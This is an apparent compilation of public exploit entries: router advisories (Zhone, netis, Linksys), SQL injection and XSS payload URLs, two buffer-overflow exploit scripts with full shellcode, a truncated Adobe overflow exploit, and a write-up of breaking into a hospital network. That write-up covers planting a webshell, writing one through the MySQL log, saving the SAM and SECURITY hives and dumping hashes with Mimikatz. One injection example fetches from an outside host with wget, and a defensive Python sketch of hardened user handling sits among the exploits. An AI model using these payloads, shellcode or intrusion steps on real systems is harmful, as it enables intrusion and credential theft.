Any low-privileged user of the ZHONE Router Web Administrative Portal can obtain all users' passwords stored in the ZHONE web server. The ZHONE router uses Base64 encoding to store all users' passwords for logging in to the Web Administrative portal. As these passwords are stored in the backup file, a malicious user can obtain all account passwords.

Affected URL: http://<Router URL>/

1. Browse to http://192.168.1.1/backupsettings.html:
2. "View Source" and take note of the sessionKey:
3. Browse to http://<Router URL>/backupsettings.conf?action=getConfig&sessionKey=<Enter Session Key Here> and all user account passwords will be returned.

3. Remote Code Injection (CVE-2014-9118)
----------------------------------------

Remote Command Injection in ZHONE Router Web Administrative Console

Any user of the ZHONE Router can gain command injection on the router and can execute arbitrary commands on the host operating system via the vulnerable ZHONE router web administrative console.

Affected URL: /zhnping.cmd?&test=traceroute&sessionKey=985703201&ipAddr=192.168.1.1|wget%20http://192.168.1.17/l00per_was_here&ttl=30&wait=3&queries=3

Affected Parameter: ipAddr

4. Stored Cross-Site Scripting
---------------------------------------------------------------------------------------

The zhnsystemconfig.cgi script is vulnerable to a stored cross-site scripting attack.

Sample HTTP Request:

GET /zhnsystemconfig.cgi?snmpSysName=ZNID24xxA-Route&snmpSysContact=Zhone%20Global%20Support&snmpSysLocation=www.zhone.com%3Cscript%3Ealert(1)%3C/script%3E&sessionKey=1853320716 HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/zhnsystemconfig.html
Cookie: dm_install=no; dm_enable=no; hwaddr=54:A0:50:E4:F5:C0
Authorization: Basic (Base 64 Encoded:<USER:PASSWORD>)
Connection: keep-alive

Affected Parameters:
1. snmpSysName
2. snmpSysLocation
3. snmpSysContact

5. Privilege Escalation via Direct Object Reference to Upload Settings Functionality
---------------------------------------------------------------------------------------

A low-privileged user can patch the router settings via the /uploadsettings.cgi page. With this functionality, the malicious attacker is able to patch the admin and support password, hence gaining full administrative access to the Zhone router.

Sample POST Request:

POST /uploadsettings.cgi HTTP/1.1
Host: 192.168.1.1
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/updatesettings.html
Cookie: dm_install=no; dm_enable=no; hwaddr=54:A0:50:E4:F5:C0
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------75010019812050198961998600862
Authorization: Basic (Base 64 Encoded:<USER:PASSWORD>)
Content-Length: 88438

-----------------------------75010019812050198961998600862
Content-Disposition: form-data; name="filename"; filename="backupsettings.conf"
Content-Type: config/conf

<?xml version="1.0"?>
<DslCpeConfig version="3.2">
...
<AdminPassword>dnFmMUJyM3oB</AdminPassword>
...
--- Configuration File Contents ---
</DslCpeConfig>

Fix Information:
----------------

Upgrade to version S3.1.241

Timeline:
---------

2014/10: Issues No. (1 & 2) reported to Zhone
2014/12: Issues No. (1 & 3) reported to Zhone
2015/01: Requested Update
2015/01: Fixes Provided by Zhone, but vulnerabilities still not fixed
2015/02: Sent P.O.C Video to show how vulnerabilities work
2015/03: Fixes Provided by Zhone, but vulnerabilities still not fixed
2015/04: Requested Update
2015/04: Issues No. (4 & 5) reported to Zhone
2015/06: Requested Update
2015/08: Requested Update
2015/09: Fixes for issue 1, 4 and 5 completed by Zhone
2015/10: Confirm that all issues have been fixed

About Vantage Point Security:
--------------------

Vantage Point is the leading provider for penetration testing and security advisory services in Singapore. Clients in the Financial, Banking and Telecommunications industries select Vantage Point Security based on technical competency and a proven track record to deliver significant and measurable improvements in their security posture.

https://www.vantagepoint.sg/
office[at]vantagepoint[dot]sg
  12. /*
ASX to MP3 Converter SOF - Ivan Ivanovic Ivanov
Иван-дурак недействительный
31337 Team holahola ~ https://www.exploit-db.com/exploits/38382/
Winblows 2k3
*/
#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <malloc.h>

int main()
{
    int i;
    /* 255 bytes of 0x41 filler up to the saved return address */
    char *overwrite_offset = malloc(255);
    for(i = 0; i < 255; i += 5) {
        char padding[] = "\x41\x41\x41\x41\x41";
        memcpy(overwrite_offset + i, padding, strlen(padding));
    }
    memset(overwrite_offset + _msize(overwrite_offset) - 1, 0x00, 1);

    char retn[] = "\x92\x72\x23\x74";

    char shellcode[] =
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" // NOP sled
        "\xdb\xc8\xd9\x74\x24\xf4\xbd\xaf\x93\x43\xb4\x5e\x31\xc9\xb1"
        "\x52\x31\x6e\x17\x83\xee\xfc\x03\xc1\x80\xa1\x41\xe1\x4f\xa7"
        "\xaa\x19\x90\xc8\x23\xfc\xa1\xc8\x50\x75\x91\xf8\x13\xdb\x1e"
        "\x72\x71\xcf\x95\xf6\x5e\xe0\x1e\xbc\xb8\xcf\x9f\xed\xf9\x4e"
        "\x1c\xec\x2d\xb0\x1d\x3f\x20\xb1\x5a\x22\xc9\xe3\x33\x28\x7c"
        "\x13\x37\x64\xbd\x98\x0b\x68\xc5\x7d\xdb\x8b\xe4\xd0\x57\xd2"
        "\x26\xd3\xb4\x6e\x6f\xcb\xd9\x4b\x39\x60\x29\x27\xb8\xa0\x63"
        "\xc8\x17\x8d\x4b\x3b\x69\xca\x6c\xa4\x1c\x22\x8f\x59\x27\xf1"
        "\xed\x85\xa2\xe1\x56\x4d\x14\xcd\x67\x82\xc3\x86\x64\x6f\x87"
        "\xc0\x68\x6e\x44\x7b\x94\xfb\x6b\xab\x1c\xbf\x4f\x6f\x44\x1b"
        "\xf1\x36\x20\xca\x0e\x28\x8b\xb3\xaa\x23\x26\xa7\xc6\x6e\x2f"
        "\x04\xeb\x90\xaf\x02\x7c\xe3\x9d\x8d\xd6\x6b\xae\x46\xf1\x6c"
        "\xd1\x7c\x45\xe2\x2c\x7f\xb6\x2b\xeb\x2b\xe6\x43\xda\x53\x6d"
        "\x93\xe3\x81\x22\xc3\x4b\x7a\x83\xb3\x2b\x2a\x6b\xd9\xa3\x15"
        "\x8b\xe2\x69\x3e\x26\x19\xfa\xed\xa7\x55\x71\x85\xc5\x95\x84"
        "\xed\x43\x73\xec\x01\x02\x2c\x99\xb8\x0f\xa6\x38\x44\x9a\xc3"
        "\x7b\xce\x29\x34\x35\x27\x47\x26\xa2\xc7\x12\x14\x65\xd7\x88"
        "\x30\xe9\x4a\x57\xc0\x64\x77\xc0\x97\x21\x49\x19\x7d\xdc\xf0"
        "\xb3\x63\x1d\x64\xfb\x27\xfa\x55\x02\xa6\x8f\xe2\x20\xb8\x49"
        "\xea\x6c\xec\x05\xbd\x3a\x5a\xe0\x17\x8d\x34\xba\xc4\x47\xd0"
        "\x3b\x27\x58\xa6\x43\x62\x2e\x46\xf5\xdb\x77\x79\x3a\x8c\x7f"
        "\x02\x26\x2c\x7f\xd9\xe2\x5c\xca\x43\x42\xf5\x93\x16\xd6\x98"
        "\x23\xcd\x15\xa5\xa7\xe7\xe5\x52\xb7\x82\xe0\x1f\x7f\x7f\x99"
        "\x30\xea\x7f\x0e\x30\x3f";

    /* filler + return address + shellcode, assembled into one buffer */
    int buffer_size = _msize(overwrite_offset) + strlen(retn) + strlen(shellcode);
    char *buffer = malloc(buffer_size);
    memcpy(buffer, overwrite_offset, _msize(overwrite_offset));
    memcpy(buffer + _msize(overwrite_offset), retn, strlen(retn));
    memcpy(buffer + _msize(overwrite_offset) + strlen(retn), shellcode, strlen(shellcode));
    memset(buffer + buffer_size - 1, 0x00, 1);

    /* binary mode so no byte of the payload is subject to newline translation;
       the buffer is written with its full length, since the original
       fprintf(fp, buffer) treated it as a format string and stopped at the
       first NUL byte inside the filler */
    FILE *fp = fopen("exploit.asx", "wb");
    if (fp == NULL) {
        perror("fopen");
        return 1;
    }
    fwrite(buffer, 1, buffer_size, fp);
    fclose(fp);

    free(buffer);
    free(overwrite_offset);
    return 0;
}
  13. # Exploit Title: Boxoft WAV to MP3 Converter 1.1 - SEH Buffer Overflow
# Date: 10/13/2015
# Exploit Author: ArminCyber
# Contact: Armin.Exploit@gmail.com
# Version: 1.1
# Tested on: XP SP3 EN
# Description: A malicious .aiff file causes this vulnerability.
# category: Local Exploit

# Python 2; opened in binary mode so the raw bytes below are written unchanged
f = open("malicious.aiff", "wb")
f.write("A"*4132)
f.write("\xeb\x06\x90\x90")   # nSEH: short jump over the SEH record
f.write("\xa4\x43\x40\x00")   # SEH handler address
# Shellcode:
# windows/exec - 277 bytes
# CMD=calc.exe
f.write("\x90"*20)
f.write("\xba\xd5\x31\x08\x38\xdb\xcb\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"
        "\x33\x83\xc3\x04\x31\x53\x0e\x03\x86\x3f\xea\xcd\xd4\xa8\x63"
        "\x2d\x24\x29\x14\xa7\xc1\x18\x06\xd3\x82\x09\x96\x97\xc6\xa1"
        "\x5d\xf5\xf2\x32\x13\xd2\xf5\xf3\x9e\x04\x38\x03\x2f\x89\x96"
        "\xc7\x31\x75\xe4\x1b\x92\x44\x27\x6e\xd3\x81\x55\x81\x81\x5a"
        "\x12\x30\x36\xee\x66\x89\x37\x20\xed\xb1\x4f\x45\x31\x45\xfa"
        "\x44\x61\xf6\x71\x0e\x99\x7c\xdd\xaf\x98\x51\x3d\x93\xd3\xde"
        "\xf6\x67\xe2\x36\xc7\x88\xd5\x76\x84\xb6\xda\x7a\xd4\xff\xdc"
        "\x64\xa3\x0b\x1f\x18\xb4\xcf\x62\xc6\x31\xd2\xc4\x8d\xe2\x36"
        "\xf5\x42\x74\xbc\xf9\x2f\xf2\x9a\x1d\xb1\xd7\x90\x19\x3a\xd6"
        "\x76\xa8\x78\xfd\x52\xf1\xdb\x9c\xc3\x5f\x8d\xa1\x14\x07\x72"
        "\x04\x5e\xa5\x67\x3e\x3d\xa3\x76\xb2\x3b\x8a\x79\xcc\x43\xbc"
        "\x11\xfd\xc8\x53\x65\x02\x1b\x10\x99\x48\x06\x30\x32\x15\xd2"
        "\x01\x5f\xa6\x08\x45\x66\x25\xb9\x35\x9d\x35\xc8\x30\xd9\xf1"
        "\x20\x48\x72\x94\x46\xff\x73\xbd\x24\x9e\xe7\x5d\x85\x05\x80"
        "\xc4\xd9")
f.write("\x90"*20)
f.close()
  14. source: https://www.securityfocus.com/bid/59030/info jPlayer is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. http://www.example.com/Jplayer.swf?id=%3Cimg%20src=x%20onerror=alert\u0028\u0027moin\u0027\u0029%3E&jQuery=document.write
  15. source: https://www.securityfocus.com/bid/59022/info Request Tracker is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. RT 4.0.10 is vulnerable; other versions may also be affected. POST /Approvals/ HTTP/1.0 Content-Type: application/x-www-form-urlencoded Cookie: RT_SID_example.com.80=7c120854a0726239b379557f024cc1cb Accept-Language: en-US Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.example.com/Approvals/ Host: 10.10.10.70 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Content-Length: 120 ShowPending=1%27+and+%27f%27%3D%27f%27%29+--+&ShowResolved=1&ShowRejected=1&ShowDependent=1&CreatedBefore=&CreatedAfter=
  16. source: https://www.securityfocus.com/bid/59041/info Hero is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Hero 3.791 is vulnerable; other versions may also be affected. http://www.example.com/users/login?username=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
  17. source: https://www.securityfocus.com/bid/59021/info Spider Video Player plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Spider Video Player 2.1 is vulnerable; other versions may also be affected. http://www.example.com/wp-content/plugins/player/settings.php?playlist=[num]&theme=[SQL]
18. 0x00 Information gathering

Received an urgent test task with only a target name (a hospital) and a single IP. First, a full-port scan of the obtained IP with Goby. The services include WebLogic, JBoss, Spring Boot, Struts2 and various other systems (a simple practice range).

0x01 External network penetration

Among these, I tried JexBoss and the various WebLogic deserialization CVEs. However, a weak password (admin/admin) was found on the Clinical Skills Center management platform on port 8282, which logs into the backend normally.

After testing, the screen information management settings under target dictionary management have an image upload that accepts file uploads. Upload a JSP with a .png suffix, capture the request directly with Burp Suite, and change the suffix back to .jsp.

After upload, the target URL and webshell are reachable, but connecting directly with Godzilla fails. Master Hum found that the current page's cookie is needed when connecting (the target redirects: if you are not logged in you are sent back to the login page, so the webshell URL cannot be reached normally). With the cookie the webshell connects normally (once the cookie expires the webshell drops).

After connecting successfully, to stabilize the webshell I tried writing it into the web root and the static file directory, but these are also affected by the forced redirect. So the webshell content was written into a normal JSP file that is accessible before login, to keep the shell stable.

0x02 Intranet penetration

Then target information was collected: the portal web server is a Linux host, large files cannot be uploaded, there is a forced redirect on web paths, and the IP is 172.20.10.49.

First I tried Neo-reGeorg, writing its tunnel into the website root and passing the cookie to the proxy, but it failed (I think the reason may be the site's forced redirect). Then I tried pystinger (Stinger); after uploading the server and webshell to the target machine I found it would not run properly (the program reported an error and the code looked wrong).

So I went back to Neo-reGeorg, this time replacing a normal JSP page on the target site with the Neo-reGeorg tunnel.jsp content. That page turned out to have no forced redirect (I guessed the redirect is based on file name, with a whitelist); connecting locally, the proxy worked (errors were reported but without effect).

Scan the intranet through the forward proxy with Ladon (command: wadon.exe 172.20.10.1/24 webscan); the scan results are as follows.

A target has a phpStudy probe page, and the probe page shows MySQL with the weak password root. Scanning directories also turned up a phpMyAdmin page under this IP; root/root logs in.

After testing, the database user has no OUTFILE export permission, but a getshell through the log file works: change general_log_file to 222.php in the website root, then execute

select <?php phpinfo(); assert($_POST['cmd']); ?>

to get the shell.

This host turned out to be Windows with SYSTEM privileges, but it still has no outbound network access. Checking the processes with tasklist against a list of AV processes shows Kaspersky on the target host (process avp.exe).

Master Cobaltzirs0N tried the shadow copy method to grab the target's SYSTEM, SECURITY and SAM files for offline decryption locally, but after running wmic shadowcopy call create Volume='C:\', vssadmin list shadows returned an error.

Since we have SYSTEM privileges, export the files directly through PowerShell:

reg save HKLM\SYSTEM system
reg save HKLM\SECURITY security
reg save HKLM\SAM sam

Mimikatz decrypts the hashes successfully (the password cannot be decoded). At this point there are three ways to log in over Remote Desktop:

1. Add an account directly (Kaspersky does not intercept it)

At this point the administrator must have noticed the intranet movement and shut the site's backend down directly.

0x03 Penetration summary

1. Scanned the target IP with Goby and found the middleware components WebLogic, JBoss, Spring Boot and Struts2, and the Clinical Skills Center management platform.
2. After entering the backend, found an image upload location with file upload; this is a JSP file, connected through Godzilla.
3. The connection fails; the cookie value must be added to Godzilla's request configuration before connecting (the site sends unauthenticated visitors to the login page when a page is accessed).
4. So the content of a site page was replaced with the content of tunnel.jsp, which is accessible normally. reGeorg + Proxifier are used here to run a local SOCKS proxy.
5. Through the local proxy, scanned the intranet segment where the target sits with don.exe 172.20.10.1/24 webscan and found a phpStudy probe page at 172.20.10.49. Visiting the 172.20.10.49 page through the local proxy with chrome.exe, the page's MySQL service has the weak password root/root.
6. At the same time, scanned the 172.20.10.49 directories with dirsearch through the local proxy and found a phpMyAdmin page; through the local proxy, chrome.exe accessed 172.20.10.49/phpmyadmin and got in with the weak password root/root.
7. Found the site's absolute path via show variables like '%general%' and wrote the webshell: select <?php phpinfo(); assert($_POST['cmd']); ?> into outfile 'e:/phpstudy/www/shell.php'; getshell.
8. Through the local proxy, connected to 172.20.10.49/shell.php with AntSword (Ajian). Ran tasklist and confirmed Kaspersky (avp.exe) is present on the system; whoami shows SYSTEM privileges.
9. After trying the command wmic shadowcopy call create Volume='C:', querying with vssadmin list shadows errors out with "Class not registered".
10. powershell reg save hklm\system e:/phpstudy/www/system; powershell reg save hklm\security e:/phpstudy/www/security; powershell reg save hklm\sam e:/phpstudy/www/sam
11. Tried Mimikatz and decrypted the hash values successfully: mimikatz # lsadump::sam /sam:sam.hiv /system:system.hiv

Reposted from: Fight Tigers Team
  19. source: https://www.securityfocus.com/bid/59041/info Hero is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Hero 3.791 is vulnerable; other versions may also be affected. http://www.example.com/users/forgot_password?error=PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpOzwvc2NyaXB0Pg==
20. source: https://www.securityfocus.com/bid/59053/info Aibolit is prone to an information-disclosure vulnerability. Attackers can exploit this issue to obtain sensitive information that may aid in launching further attacks. http://www.example.com/AI-BOLIT-REPORT-<date>-<time>.html
21. source: https://www.securityfocus.com/bid/59054/info Cisco Linksys EA2700 routers are prone to the following security vulnerabilities:
1. A security-bypass vulnerability
2. A cross-site request-forgery vulnerability
3. A cross-site scripting vulnerability
An attacker can exploit these issues to bypass certain security restrictions, steal cookie-based authentication credentials, gain access to system and other configuration files, or perform unauthorized actions in the context of a user session. Cisco Linksys EA2700 running firmware 1.0.12.128947 is vulnerable. The following example request is available:

POST /apply.cgi HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:13.0) Gecko/20100101 Firefox/13.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 47

submit_button=xss'%3balert(1)//934&action=Apply
  22. source: https://www.securityfocus.com/bid/59055/info The Linux kernel is prone to multiple local denial-of-service vulnerabilities. Attackers can exploit these issues to trigger a kernel crash, which may result in a denial-of-service condition. cd /sys/kernel/debug/tracing echo 1234 | sudo tee -a set_ftrace_pid
23. # Exploit Title: [netis RealTek wireless router / ADSL modem Multiple Vulnerabilities]
# Discovered by: Karn Ganeshen
# Reported on: [October 13, 2015]
# Vendor Response: [Vulnerability? What's this?]
# Vendor Homepage: [www.netis-systems.com]
# Version Affected: [Firmware version RTK v2.1.1]

**Vulnerability Details**

1. Default, weak passwords for http and ftp services

a. *HTTP accounts*
- guest/guest
- user/user
- guest/XXXXairocon

<chain N="USERNAME_PASSWORD">
<V N="FLAG" V="0x0"/>
<V N="USERNAME" V="guest"/>
<V N="PASSWORD" V="guest"/>
<V N="BACKDOOR" V="0x0"/>
<V N="PRIORITY" V="0x2"/>
</chain>
<chain N="USERNAME_PASSWORD">
<V N="FLAG" V="0x0"/>
<V N="USERNAME" V="user"/>
<V N="PASSWORD" V="user"/>
<V N="BACKDOOR" V="0x0"/>
<V N="PRIORITY" V="0x0"/>
</chain>
<chain N="USERNAME_PASSWORD">
<V N="FLAG" V="0x0"/>
<V N="USERNAME" V="guest"/>
<V N="PASSWORD" V="XXXXairocon"/>
<V N="BACKDOOR" V="0x1"/>
<V N="PRIORITY" V="0x1"/>
</chain>

*XXXX -> last four digits of MAC address*

b. *FTP accounts*
- admin/admin
- useradmin/useradmin
- user/user

<chain N="FTP_SERVER">
<V N="ENABLE" V="0x1"/>
<V N="USERNAME" V="admin"/>
<V N="PASSWORD" V="admin"/>
<V N="PORT" V="0x15"/>
<V N="USERRIGHT" V="0x3"/>
<V N="INSTNUM" V="0x1"/>
</chain>
<chain N="FTP_SERVER">
<V N="ENABLE" V="0x1"/>
<V N="USERNAME" V="useradmin"/>
<V N="PASSWORD" V="useradmin"/>
<V N="PORT" V="0x15"/>
<V N="USERRIGHT" V="0x2"/>
<V N="INSTNUM" V="0x2"/>
</chain>
<chain N="FTP_SERVER">
<V N="ENABLE" V="0x1"/>
<V N="USERNAME" V="user"/>
<V N="PASSWORD" V="user"/>
<V N="PORT" V="0x15"/>
<V N="USERRIGHT" V="0x1"/>
<V N="INSTNUM" V="0x3"/>
</chain>

2. *Backdoor accounts*

The device comes configured with a privileged backdoor account. For HTTP, 'guest' with attribute <V N="BACKDOOR" V="0x1"/> is the backdoor account. This is seen in the config file:

<chain N="USERNAME_PASSWORD">
<V N="FLAG" V="0x0"/>
<V N="USERNAME" V="guest"/>
<V N="PASSWORD" V="XXXXairocon"/>
<V N="BACKDOOR" V="0x1"/>
<V N="PRIORITY" V="0x1"/>
</chain>

This user is not shown / visible in the user list when logged in as guest (privileged user).

3. *No CSRF protection*

There is no CSRF token set in any of the forms / pages. It is possible to silently execute HTTP requests if the user is logged in.

4. *Weak RBAC controls*

5a) *A non-root/non-admin user (user) can create and delete any other users, including root-privileged accounts.*

In the netis RealTek wireless router ADSL modem there are three users:

guest:guest -> priv 2, the super user account with full functional access
user:user -> priv 0 -> can access only some functions
guest:XXXXairocon -> privileged backdoor login

*Normally:*
- user can create new accounts with restricted user privs only.
- user can change its own password and only those of other non-root users.
- user can delete any other non-root users.

However, the application does not enforce strict RBAC and it is possible for a non-root user to create a new user with root privileges. This is done as follows:

1. Start creating a new user, and intercept the user creation POST request
2. Intercept & change the privilege parameter value from 0 (user) to 2 (root) - submit the request
3. When the new root user is created successfully, it does not show up in the user list
4. Confirm by logging in as the new root, and / or via the configured accounts in the configuration file (config.img)

This is the POST request to create a new user:

*Create user http request*:

POST /form2userconfig.cgi HTTP/1.1
Host: <IP>
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://<IP>/userconfig.htm?v=
Cookie: SessionID=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 115

username=test&privilege=2&newpass=test&confpass=test&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=

*Note1*: In some cases, this password change function is not accessible to 'user' via the GUI. But we can still send a POST request to create a valid, new root privileged account.

*Note2*: In some cases, the application does not create the root priv user on the first attempt. However, on the 2nd or 3rd attempt, the new user is created without any issue.

*Delete user http request:*

A non-root/non-admin user can delete any configured user(s) including privileged users (guest).

POST /form2userconfig.cgi HTTP/1.1
Host: <ip>
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://<IP>/userconfig.htm
Cookie: SessionID=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 131

username=test&privilege=2&oldpass=&newpass=&confpass=&deluser=Delete&select=s3&hiddenpass=test&submit.htm%

In case a (non-root) user is deleting a root login (guest, priv 2), the action status can be confirmed by checking the configuration. In case a (non-root) user is deleting a user login (priv 0), the action status can be confirmed by checking the user list.

5b) *(non-root priv) User can access unauthorized functions.*

Normally, 'user' does not have access to all the functionality of the device. It has access to Status, Setup and Maintenance. However, a few functions can still be accessed by calling them directly. For example, to access the MAC filtering configuration this URL can be opened directly:

http://<IP>/fw-macfilter.htm

Other functions may also be accessible in this manner.

6. *Sensitive information not secured from low privileged users*

A non-root / non-admin privileged user has access to download the configuration file - config.img. This file contains clear-text passwords, keys and other sensitive information which can be used to gain privileged access.

7. *Sensitive information accessible in clear-text*

Sensitive information like passwords and keys is not secured properly. Mostly these are either shown in clear-text or, where censored as *****, it is possible to view the clear-text values with 'Inspect Element' locally, by intercepting HTTP requests, or by sniffing.

--
Best Regards,
Karn Ganeshen
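The root cause behind 5a is that form2userconfig.cgi takes the new account's privilege level from the request body instead of from the session that sent it. The following is an added Python 3 sketch, not the device's firmware (which is not available here), of the add/delete handling done the observed way and the corrected way, driven by the exact request body from the advisory. The privilege values 0 and 2 come from the config.img excerpts; the in-memory user table, the session dict and the csrf_token field (which also addresses item 3) are assumptions for the illustration.

```python
from urllib.parse import parse_qs

# Privilege levels as they appear in config.img: 0 = user, 1 = backdoor, 2 = root (guest)
PRIV_USER, PRIV_BACKDOOR, PRIV_ROOT = 0, 1, 2


def parse_form(body: str) -> dict:
    """Flatten an application/x-www-form-urlencoded body into {field: value}."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def add_user_vulnerable(users: dict, session: dict, body: str) -> dict:
    """What the advisory observes: whoever is logged in, the 'privilege' field
    in the POST decides the new account's level."""
    f = parse_form(body)
    users[f["username"]] = {"priv": int(f["privilege"]), "password": f["newpass"]}
    return users


def _authorize(session: dict, f: dict) -> None:
    # Item 3 of the advisory: no CSRF token. Bind every state change to the session.
    if f.get("csrf_token") != session["csrf"]:
        raise PermissionError("missing or wrong CSRF token")


def add_user_hardened(users: dict, session: dict, body: str) -> dict:
    f = parse_form(body)
    _authorize(session, f)
    if f["newpass"] != f["confpass"]:
        raise ValueError("password confirmation mismatch")
    if f["username"] in users:
        raise ValueError("user already exists")
    requested = int(f.get("privilege", PRIV_USER))
    if requested not in (PRIV_USER, PRIV_ROOT):      # never accept the backdoor level
        raise ValueError("unknown privilege level %d" % requested)
    # The caller's session, not the form, bounds what may be created.
    if session["priv"] < PRIV_ROOT and requested != PRIV_USER:
        raise PermissionError("a non-root session cannot create privilege %d" % requested)
    users[f["username"]] = {"priv": requested, "password": f["newpass"]}
    return users


def delete_user_hardened(users: dict, session: dict, body: str) -> dict:
    f = parse_form(body)
    _authorize(session, f)
    target = users.get(f["username"])
    if target is None:
        raise KeyError(f["username"])
    # Non-root sessions may only remove plain users; nobody may remove the last root.
    if session["priv"] < PRIV_ROOT and target["priv"] != PRIV_USER:
        raise PermissionError("a non-root session cannot delete a privileged account")
    if target["priv"] == PRIV_ROOT and sum(u["priv"] == PRIV_ROOT for u in users.values()) == 1:
        raise PermissionError("refusing to delete the last root account")
    del users[f["username"]]
    return users


# Constructed starting state: two of the HTTP accounts from the config excerpts
DEFAULT_USERS = {
    "guest": {"priv": PRIV_ROOT, "password": "guest"},
    "user": {"priv": PRIV_USER, "password": "user"},
}

# The exact 'create user' body from the advisory (privilege tampered from 0 to 2)
ADD_BODY = ("username=test&privilege=2&newpass=test&confpass=test&adduser=Add"
            "&hiddenpass=&submit.htm%3Fuserconfig.htm=")

if __name__ == "__main__":
    low = {"priv": PRIV_USER, "csrf": "tok"}
    print(add_user_vulnerable(dict(DEFAULT_USERS), low, ADD_BODY)["test"])   # priv 2 from a priv 0 session
    try:
        add_user_hardened(dict(DEFAULT_USERS), low, ADD_BODY + "&csrf_token=tok")
    except PermissionError as e:
        print("rejected:", e)
```

The fix is the single comparison against session["priv"]: the form may still carry a privilege field for the UI, but the server never lets it exceed what the authenticated caller holds, and the same rule applied on delete closes the second half of 5a.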
24. '''
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-ADOBE-WRKGRP-BUFFER-OVERFLOW.txt

Vendor:
================================
www.adobe.com

Product:
=================================
AdobeWorkgroupHelper.exe v2.8.3.3
Part of Photoshop 7.0 circa 2002

Vulnerability Type:
===========================
Stack Based Buffer Overflow

CVE Reference:
==============
N/A

Vulnerability Details:
=====================
AdobeWorkgroupHelper.exe is a component of the Photoshop 7 workgroup functionality that lets users work with files on a server that is registered as a workgroup. If AdobeWorkgroupHelper.exe is called with an overly long command line argument it is vulnerable to a stack based buffer overflow, resulting in arbitrary code execution and undermining the integrity of the program.

We can control the EIP register at about 5,856 bytes; the ECX register points at our shellcode.

Tested successfully on Windows 7 SP1

Exploit code(s):
===============
Use below python script to exploit...
'''

import struct,os,subprocess

#Photoshop 7 AdobeWorkgroupHelper.exe buffer overflow exploit
#Tested Windows 7 SP1
#------------------------------------
#by hyp3rlinx - apparitionsec@gmail.com
#hyp3rlinx.altervista.org
#==============================================================
#
#0x618b19f7 : call ecx | {PAGE_EXECUTE_READ} [ARM.dll]
#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.8.3.3
#(C:\Program Files (x86)\Common Files\Adobe\Workflow\ARM.dll)
#===============================================================

'''
Quick Register dump...

EAX 00270938
ECX 00270A7C <---------------BOOM!
EDX 00A515FC ASCII "AAAAAA..."
EBX 41414140
ESP 0018FEB0
EBP 0018FED0
ESI 00000000
EDI 41414141
EIP 004585C8 AdobeWor.004585C8
C 0 ES 002B 32bit 0(FFFFFFFF)
P 0 CS 0023 32bit 0(FFFFFFFF)
A 0 SS 002B 32bit 0(FFFFFFFF)
Z 0 DS 002B 32bit 0(FFFFFFFF)
S 0 FS 0053 32bit 7EFDD000(FFF)
T 0 GS 002B 32bit 0(FFFFFFFF)
D 0
O 0 LastErr ERROR_SUCCESS (00000000)
EFL 00010202 (NO,NB,NE,A,NS,PO,GE,G)
'''

#shellcode to pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
